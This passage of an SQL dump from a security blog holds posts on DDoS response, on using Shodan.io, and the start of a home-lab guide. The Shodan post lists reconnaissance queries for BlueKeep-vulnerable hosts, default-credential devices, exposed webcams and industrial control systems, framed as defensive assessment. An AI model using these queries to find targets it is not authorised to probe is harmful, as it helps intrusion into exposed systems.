consider:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">DDoS Protection Services</strong></b> like Cloudflare or AWS Shield, which act as a shield against bad traffic.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Traffic Filtering Solutions</strong></b> that differentiate between legitimate users and malicious bots attempting to overload your site.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Content Delivery Networks (CDNs)</strong></b> that distribute your server load to minimize the impact on your core infrastructure.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These tools serve as the “security guards” of your digital landscape, letting legitimate users in while blocking harmful traffic.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">5. Learn and Improve After the Attack</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once the storm has passed and your website is back online, take the time to analyze what happened. Here’s how:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Review what went well during your team\'s response and identify areas that need improvement.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Strengthen weaknesses in your network security or response strategy.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Schedule a post-attack audit to ensure no long-term damage was inflicted.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Think of it like fortifying your home after a break-in. By improving your defenses, you\'re making it significantly harder for attackers to succeed next time.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Bonus Tips to Strengthen Your DDoS Preparedness</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Following these steps is a great start, but there’s more you can do to build a robust defense. Here are some bonus tips:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Practice Makes Perfect</strong></b>: Conduct regular DDoS drills to evaluate your team\'s readiness and effectiveness.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Stay Updated</strong></b>: Cyber threats evolve rapidly. Keep up with the latest <b><strong class=\"font-bold\">cybersecurity tools</strong></b> and DDoS trends to stay a step ahead of attackers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Educate Your Team</strong></b>: Provide regular training on identifying phishing attempts and other social engineering tactics often used alongside DDoS attacks.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">The Importance of Proactive Network Security</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your website is the heart of your online presence, and protecting it isn\'t just about preventing downtime—it\'s about ensuring trust. Both your customers and your employees rely on your website to function smoothly. With proactive measures like a DDoS response plan, transparent communication, and the implementation of <b><strong class=\"font-bold\">network security</strong></b> tools, your organization can confidently reduce the risks associated with DDoS attacks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Remember, preparation is your best defense. Use these strategies to enhance your business\'s resilience against cyber threats and maintain a secure digital presence.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Need help taking the next step? Download our free guide to creating a comprehensive DDoS response plan and fortify your defenses today!</p>\r\n<p data-sourcepos=\"43:1-43:267\"><a href=\"https://infoseclabs.io/wp-content/uploads/2024/06/DDOS-INCIDENT-RESPONSE.pdf\">DDOS INCIDENT RESPONSE</a></p>', '', NULL, NULL, 1, 'draft', '2024-08-01 03:18:42', '2026-01-12 21:41:44', 'Information Security', 'DDoS Attacks! How to Stay Protected', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(125, 'Exploring Shodan.io: A Powerful Tool in Cybersecurity', 'exploring-shodan-io-a-powerful-tool-in-cybersecurity', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The field of cybersecurity continues to evolve, and the demand for powerful, effective tools that identify and mitigate risks has never been more critical. Among the arsenal available to cybersecurity professionals, <b><strong class=\"font-bold\">Shodan.io</strong></b> stands out as an exceptional resource, enabling users to explore the landscape of internet-connected devices.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog post will provide an in-depth introduction to <b><strong class=\"font-bold\">Shodan.io</strong></b>, explain its core functionalities, and highlight how this tool is reshaping the way we approach <b><strong class=\"font-bold\">cybersecurity</strong></b>, particularly in the realms of <b><strong class=\"font-bold\">network security</strong></b> and <b><strong class=\"font-bold\">IoT security</strong></b>.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Is Shodan.io?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unlike traditional search engines that focus on web pages, <b><strong class=\"font-bold\">Shodan.io</strong></b> is specifically designed to index internet-connected devices—ranging from servers and routers to webcams and industrial systems. This tool goes beyond the conventional, allowing users to collect vital information like device types, physical locations, software versions, and potential security vulnerabilities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For <b><strong class=\"font-bold\">cybersecurity professionals</strong></b>, this makes Shodan.io an essential tool, offering unparalleled insights into the ecosystem of internet-connected devices and helping identify areas of potential risk.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Benefits of Shodan.io for Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Shodan.io empowers organizations by improving their ability to monitor, analyze, and secure their networks. Here’s a closer look at how cybersecurity professionals use it to enhance their <b><strong class=\"font-bold\">network security</strong></b> operations:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Vulnerability Assessment</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of Shodan.io’s most valuable features is its ability to streamline vulnerability assessments. Using specific queries, professionals can search for internet-facing systems running outdated or vulnerable software.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For instance:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Query</strong></b>: `apache/2.4.20`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Description</strong></b>: This query identifies servers running Apache version 2.4.20, which may have known vulnerabilities. Cybersecurity teams can then evaluate and mitigate potential threats.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Network Enumeration</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Shodan.io enables comprehensive network mapping, allowing users to identify all publicly accessible assets within a specific IP range. By understanding their digital footprint, organizations can strengthen their defenses.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Query</strong></b>: `net:192.168.0.0/24`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Description</strong></b>: This query discovers devices linked to a particular IP range. Cybersecurity teams can then analyze these devices to identify potential weak points.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Default Credentials Identification</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Devices using weak or default credentials are a common vulnerability. Shodan.io makes it easy to identify such devices before attackers can exploit them.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Query</strong></b>: `default password`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Description</strong></b>: A search for devices with weak or default credentials helps teams address major security gaps preemptively.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">IoT Device Security</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the rise of the <b><strong class=\"font-bold\">Internet of Things (IoT)</strong></b>, the potential attack surface is larger than ever. Shodan.io offers insights into IoT device security by detecting vulnerabilities in connected devices like webcams or routers.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Query</strong></b>: `port:554 has_screenshot`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Description</strong></b>: This identifies devices using port 554, often for RTSP streaming services like webcams. Cybersecurity professionals can assess the risk posed by these devices and implement appropriate safeguards.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Geolocation Mapping</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Shodan.io’s geolocation capabilities enable professionals to pinpoint the physical locations of devices. This proves invaluable for incident response and threat analysis.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Query</strong></b>: `country:\"US\"`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Description</strong></b>: By specifying a country, users can identify devices located within that region. This information assists in creating effective response plans and understanding the global distribution of connected devices.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Essential Shodan.io Search Queries for Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Shodan.io offers a wide range of queries to help professionals identify vulnerabilities and protect internet-connected devices. Here are some of the most critical queries you should know:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Software Version Search</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><i><em class=\"italic\">Query</em></i>: `apache/2.4.20`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><i><em class=\"italic\">Example</em></i>: Find servers with a specific version of Apache that may have exploitable vulnerabilities.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Service Banner Search</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><i><em class=\"italic\">Query</em></i>: `title:\"Cisco Adaptive Security Appliance\"`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><i><em class=\"italic\">Example</em></i>: Locate Cisco ASA firewalls based on service banners.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Vulnerability-Specific Search</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><i><em class=\"italic\">Query</em></i>: `vuln:cve-2019-0708`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\"><i><em class=\"italic\">Example</em></i>: Locate devices affected by vulnerabilities like the BlueKeep RDP exploit.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\"><b><strong class=\"font-bold\">SSH Key Search</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"8\"><i><em class=\"italic\">Query</em></i>: `port:22 has_ssh`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"9\"><i><em class=\"italic\">Example</em></i>: Identify devices with SSH enabled, which could represent potential access points for attackers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"10\"><b><strong class=\"font-bold\">Industrial Control Systems (ICS) Search</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"11\"><i><em class=\"italic\">Query</em></i>: `tag:ics`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"12\"><i><em class=\"italic\">Example</em></i>: Detect vulnerable ICS devices critical to industrial operations.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Shodan.io Is a Game-Changer for Network Security</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Shodan.io fundamentally changes the way cybersecurity professionals approach network and <b><strong class=\"font-bold\">IoT security</strong></b>. Here’s why it’s indispensable for enterprises and organizations:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Enhanced Risk Management</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Shodan.io makes it easier to identify weak points in a network, ensuring a proactive approach to mitigating vulnerabilities.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Improved Efficiency</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By automating the discovery of vulnerabilities and network mapping, organizations save valuable time and resources.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Broader Insights</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Exploring IoT device vulnerabilities and geolocating connected devices provides a more comprehensive understanding of digital infrastructure.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Unlock the Full Potential of Shodan.io</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With cyber threats becoming more sophisticated, tools like Shodan.io are essential for maintaining strong defenses. This powerful search engine is more than just a reconnaissance tool—it’s a gateway to better understanding and protecting our increasingly connected world.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Explore the possibilities Shodan.io offers for your organization today, and ensure that your cybersecurity infrastructure is one step ahead of threat actors.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Looking for more on cybersecurity tools?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Dive deeper into cybersecurity strategies and innovations with our blog, and don’t forget to subscribe for the latest insights straight to your inbox!</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:49:43', '2026-01-12 21:41:44', 'OSINT Tool', 'Exploring Shodan.io: A Powerful Tool in Cybersecurity', '', NULL),
(126, 'How to Set Up a Cybersecurity Home Lab', 'how-to-set-up-a-cybersecurity-home-lab', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Are you ready to get hands-on experience in cybersecurity? Setting up a cybersecurity home lab is one of the most effective ways to practice penetration testing, explore vulnerability assessment, and hone your skills—all in a safe and controlled environment. Whether you\'re a beginner or an experienced professional looking to expand your expertise, a home lab gives you the freedom to simulate real-world scenarios and experiment without any risks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This guide will walk you through what you need to know about setting up a simple yet effective cybersecurity home lab. From understanding the essential components to step-by-step instructions and practical exercises, you\'ll discover how to maximize the learning potential of your lab.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is a Cybersecurity Home Lab?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A cybersecurity home lab is a personal setup where you can safely simulate, explore, and address cybersecurity challenges. These labs typically involve isolated networks and devices intentionally configured to allow you to test vulnerabilities and experiment with security measures.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The primary purpose of a cybersecurity home lab is to provide hands-on experience. It helps you practice critical skills like penetration testing, vulnerability scanning, and firewall configuration—factors that are essential to becoming proficient in cybersecurity.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Set Up a Cybersecurity Home Lab?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">There are numerous benefits to creating a cybersecurity home lab:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Practice Skills Safely</strong></b>: It gives you a risk-free environment—it won’t compromise any live systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Customizable Setup</strong></b>: Tailor your lab to meet your learning objectives or simulate specific challenges.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Learn Current Tools</strong></b>: Experiment with industry-standard tools like Metasploit, Nessus, and Splunk to stay updated and competitive in your field.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Prepare for Real-World Scenarios</strong></b>: Simulate real-world attacks and learn how to develop effective countermeasures.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Enhance Your Resume</strong></b>: Whether you\'re preparing for certifications or applying for cybersecurity positions, hands-on lab experience is a valuable skill.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Now, let\'s look at how to build your lab step-by-step.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Components of a Cybersecurity Home Lab</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before getting started, it\'s essential to understand the key components you\'ll need:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Attack Device</strong></b>: A laptop or desktop equipped with <b><strong class=\"font-bold\">Kali Linux</strong></b>. This operating system is preloaded with powerful penetration testing tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Vulnerable Devices</strong></b>: Devices intentionally configured with 